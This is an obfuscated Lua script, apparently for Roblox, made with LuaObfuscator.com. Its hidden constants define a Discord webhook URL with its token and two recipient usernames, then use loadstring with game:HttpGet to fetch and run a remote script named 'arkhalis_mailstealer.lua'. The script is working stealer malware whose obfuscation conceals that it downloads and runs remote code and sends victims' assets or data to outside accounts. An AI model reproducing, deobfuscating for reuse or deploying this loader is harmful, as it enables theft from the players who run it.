--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 
 
]]--
 
do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(((3 + 0) -(1 -0))^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v84-(v84%(932 -(857 + (1139 -(68 + 997))))) ;else local v85=568 -(367 + 201) ;local v86;while true do if ((927 -(214 + 713))==v85) then v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==((3118 -1848) -(226 + 768 + 276))) then v35,v36,v37,v38=v1(v16,v19,v19 + (12 -(35 -26)) );v19=v19 + (6 -2) ;v34=118 -(32 + 85) ;end if (v34==(1 + 0)) then return (v38 * (16777396 -(67 + 113))) + (v37 * (48056 + 17480)) + (v36 * (57 + 199)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v67=0;while true do if (v67==(698 -(208 + 490))) then local v90=0 + 0 ;while true do if (v90==1) then v67=1 + 0 ;break;end if (v90~=(836 -(660 + 176))) then else if (v39==2) then local v101=0;local v102;while true do if (0==v101) then v102=0;while true do if (v102~=1) then else for v144=1 + 0 ,v24() do local v145=202 -(14 + 188) ;local v146;local v147;local v148;local v149;while true do if (v145==(675 -(534 + 141))) then v146=0;v147=nil;v145=1 + 0 ;end if (v145==(1 + 0)) then v148=nil;v149=nil;v145=2 + 0 ;end if (2==v145) then while true do if (v146==(1 -0)) then v149=nil;while true do if (v147==0) then local v189=0 -0 ;local v190;while true do if ((0 -0)~=v189) then else v190=0 + 0 ;while true do if (v190==1) then v147=1;break;end if (0==v190) then local v198=0 + 0 ;while true do if (v198~=1) then else v190=1;break;end if (v198==(396 -(115 + 281))) then v148=0 -0 ;v149=nil;v198=1;end end end end break;end end end if (v147~=(1 + 0)) then else while true do if (v148~=0) then else v149=v22();if (v21(v149,2 -1 ,1)==0) then local v192=0 -0 ;local v193;local v194;local v195;local v196;local v197;while true do if (v192~=(869 -(550 + 317))) then else v197=nil;while true do if (v193==1) then local v201=0;while true do if (v201==0) then v196=nil;v197=nil;v201=1;end if (1==v201) then v193=2;break;end end end if (2~=v193) then else while true do if (v194==(1 -0)) then local v203=0;local v204;while true do if (v203==(0 -0)) then v204=0 -0 ;while true do if ((286 -(134 + 151))==v204) then v194=2;break;end if (v204~=(1665 -(970 + 695))) then else local v213=0 -0 ;while true do if (v213==0) then local v216=0;while true do if (v216==(1990 -(582 + 1408))) then v197={v23(),v23(),nil,nil};if (v195==0) then local v221=0;local v222;while true do if (0~=v221) then else v222=0;while true do if (v222~=(1824 -(1195 + 629))) then else v197[3]=v23();v197[5 -1 ]=v23();break;end end break;end end elseif (v195==(242 -(187 + 54))) then v197[3]=v24();elseif (v195==2) then v197[3]=v24() -(2^(796 -(162 + 618))) ;elseif (v195==(3 + 0)) then local v227=0;while true do if (0~=v227) then else v197[2 + 1 ]=v24() -(2^16) ;v197[4]=v23();break;end end end v216=1 -0 ;end if ((1 -0)==v216) then v213=1 + 0 ;break;end end end if (v213==(1637 -(1373 + 263))) then v204=1001 -(451 + 549) ;break;end end end end break;end end end if (v194==(1 + 1)) then local v205=0 -0 ;local v206;local v207;while true do if ((0 -0)==v205) then v206=0;v207=nil;v205=1385 -(746 + 638) ;end if (v205==(1 + 0)) then while true do if (0~=v206) then else v207=0 -0 ;while true do if (v207==0) then if (v21(v196,1,1)==1) then v197[343 -(218 + 123) ]=v45[v197[2]];end if (v21(v196,2,1583 -(1535 + 46) )==1) then v197[3]=v45[v197[3]];end v207=1;end if (v207==1) then v194=3;break;end end break;end end break;end end end if (v194~=3) then else if (v21(v196,3 + 0 ,3)~=(1 + 0)) then else v197[564 -(306 + 254) ]=v45[v197[1 + 3 ]];end v40[v144]=v197;break;end if (v194==(0 -0)) then local v209=1467 -(899 + 568) ;local v210;while true do if (v209~=0) then else v210=0 + 0 ;while true do if (v210==1) then v194=2 -1 ;break;end if (v210~=0) then else local v214=603 -(268 + 335) ;local v215;while true do if (v214==(290 -(60 + 230))) then v215=0;while true do if (v215==(572 -(426 + 146))) then v195=v21(v149,2,1 + 2 );v196=v21(v149,1460 -(282 + 1174) ,6);v215=812 -(569 + 242) ;end if ((2 -1)==v215) then v210=1;break;end end break;end end end end break;end end end end break;end if (v193==0) then local v202=0;while true do if (v202~=1) then else v193=1 + 0 ;break;end if (v202~=(1024 -(706 + 318))) then else v194=1251 -(721 + 530) ;v195=nil;v202=1;end end end end break;end if (v192~=(1272 -(945 + 326))) then else v195=nil;v196=nil;v192=2;end if (v192==(0 -0)) then v193=0;v194=nil;v192=1 + 0 ;end end end break;end end break;end end break;end if (v146==(700 -(271 + 429))) then v147=0 + 0 ;v148=nil;v146=1501 -(1408 + 92) ;end end break;end end end v39=1089 -(461 + 625) ;break;end if (v102~=0) then else local v142=1288 -(993 + 295) ;while true do if (v142~=0) then else for v182=1,v44 do local v183=0;local v184;local v185;local v186;local v187;local v188;while true do if (v183~=(1 + 0)) then else v186=nil;v187=nil;v183=2;end if (v183~=(1173 -(418 + 753))) then else v188=nil;while true do if (v184==(0 + 0)) then v185=0;v186=nil;v184=1;end if (2~=v184) then else while true do if (v185==0) then v186=0 + 0 ;v187=nil;v185=1 + 0 ;end if (v185~=(1 + 0)) then else v188=nil;while true do if (v186==1) then if (v187==(530 -(406 + 123))) then v188=v22()~=0 ;elseif (v187==(1771 -(1749 + 20))) then v188=v25();elseif (v187==3) then v188=v26();end v45[v182]=v188;break;end if (v186==(0 + 0)) then local v200=1322 -(1249 + 73) ;while true do if (0~=v200) then else v187=v22();v188=nil;v200=1;end if (v200==(1 + 0)) then v186=1146 -(466 + 679) ;break;end end end end break;end end break;end if (v184==1) then local v191=0;while true do if (v191==0) then v187=nil;v188=nil;v191=2 -1 ;end if (v191==1) then v184=5 -3 ;break;end end end end break;end if (v183==0) then v184=1900 -(106 + 1794) ;v185=nil;v183=1 + 0 ;end end end v43[3]=v22();v142=1;end if ((1 + 0)~=v142) then else v102=1;break;end end end end break;end end end if (v39==(0 -0)) then local v103=0;while true do if (v103==1) then v42={};v39=2 -1 ;break;end if (v103==0) then v40={};v41={};v103=115 -(4 + 110) ;end end end v90=1;end end end if (v67~=1) then else if (v39~=3) then else local v99=0;local v100;while true do if (v99~=(584 -(57 + 527))) then else v100=0;while true do if (v100==(1427 -(41 + 1386))) then local v108=103 -(17 + 86) ;while true do if (v108~=(0 + 0)) then else for v150=1,v24() do v41[v150-1 ]=v29();end return v43;end end end end break;end end end if (v39==(1 -0)) then v43={v40,v41,nil,v42};v44=v24();v45={};v39=168 -(122 + 44) ;end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(3 -2)) then v49=1;v50=(v21(v48,1 + (0 -0) ,1 + 2 + 17 ) * ((3 -1)^32)) + v47 ;v46=67 -(30 + 35) ;end if (v46==(2 + 0)) then v51=v21(v48,1278 -(1043 + 214) ,117 -86 );v52=((v21(v48,1244 -(323 + 889) )==(2 -1)) and  -(581 -(361 + 219))) or (321 -(53 + 267)) ;v46=3;end if ((0 + 0)==v46) then v47=v24();v48=v24();v46=1 + 0 ;end if (v46==(416 -(6 + 9 + 398))) then if (v51==(982 -(18 + 964))) then if (v50==(0 -(0 -0))) then return v52 * 0 ;else v51=1 + (0 -0) ;v49=0 + 0 ;end elseif (v51==2047) then return ((v50==((2401 -(1126 + 425)) -(20 + (1235 -(118 + 287))))) and (v52 * ((1 + 0)/(126 -((454 -338) + 10))))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/((1 + 1)^(790 -(542 + 196))))) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(1121 -(118 + 1003))) then return "";end end v54=v3(v16,v19,(v19 + v53) -(2 -1) );v19=v19 + v53 ;local v55={};for v68=378 -(142 + 235) , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0 + 0 ;local v58;local v59;while true do if (v57==((8 -4) -3)) then return (v59 * (56 + 200)) + v58 ;end if (v57==(977 -(553 + 424))) then v58,v59=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (3 -1) ;v57=1;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v87=v2(v0(v60,16));if v20 then local v91=0;local v92;while true do if (v91==0) then v92=v5(v87,v20);v20=nil;v91=1;end if (v91==1) then return v92;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v70=v64;local v71=v65;local v72=v66;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==0) then v82=v70[v74];v83=v82[1];v89=1;end if (v89==1) then if (v83<=5) then if (v83<=2) then if (v83<=0) then v80[v82[2]]();elseif (v83>1) then v80[v82[2]][v82[3]]=v82[4];else v80[v82[2]]=v82[3];end elseif (v83<=3) then v74=v82[3];elseif (v83>4) then local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (v113==6) then v74=v74 + 1 ;v82=v70[v74];v118=v82[2];v80[v118]=v80[v118](v13(v80,v118 + 1 ,v75));v74=v74 + 1 ;v113=7;end if (v113==5) then v118=v82[2];v115,v116=v73(v80[v118](v13(v80,v118 + 1 ,v82[3])));v75=(v116 + v118) -1 ;v114=0;for v178=v118,v75 do v114=v114 + 1 ;v80[v178]=v115[v114];end v113=6;end if (7==v113) then v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];break;end if (v113==2) then v80[v82[2]]=v63[v82[3]];v74=v74 + 1 ;v82=v70[v74];v118=v82[2];v117=v80[v82[3]];v113=3;end if (v113==1) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v63[v82[3]];v74=v74 + 1 ;v82=v70[v74];v113=2;end if (v113==4) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v82=v70[v74];v113=5;end if (0==v113) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v80[v82[2]][v82[3]]=v82[4];v113=1;end if (v113==3) then v80[v118 + 1 ]=v117;v80[v118]=v117[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v113=4;end end else do return;end end elseif (v83<=8) then if (v83<=6) then local v105=0;local v106;local v107;while true do if (v105==0) then v106=v82[2];v107=v80[v82[3]];v105=1;end if (1==v105) then v80[v106 + 1 ]=v107;v80[v106]=v107[v82[4]];break;end end elseif (v83==7) then v80[v82[2]]=v63[v82[3]];else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=10) then if (v83>9) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v63[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end elseif (v83==11) then local v128=0;local v129;while true do if (v128==0) then v129=v82[2];v80[v129]=v80[v129](v13(v80,v129 + 1 ,v75));break;end end else local v130=v82[2];local v131,v132=v73(v80[v130](v13(v80,v130 + 1 ,v82[3])));v75=(v132 + v130) -1 ;local v133=0;for v139=v130,v75 do v133=v133 + 1 ;v80[v139]=v131[v133];end end v74=v74 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323831353231343534333531393738352F467454342O306659613149622O655F534E506F35793656306835494A3643413167447A3159316F55665352474F4933626A44474C647A58714E3159536837755A5636306C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103103O00436F2O6D69744E6F416972496E47757403093O00557365726E616D6532035O00173O0012013O00013O00260A3O000E000100020004033O000E0001001207000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O0016000100260A3O0001000100010004033O00010001001207000100033O0030090001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00043O00017O00",v9(),...);end
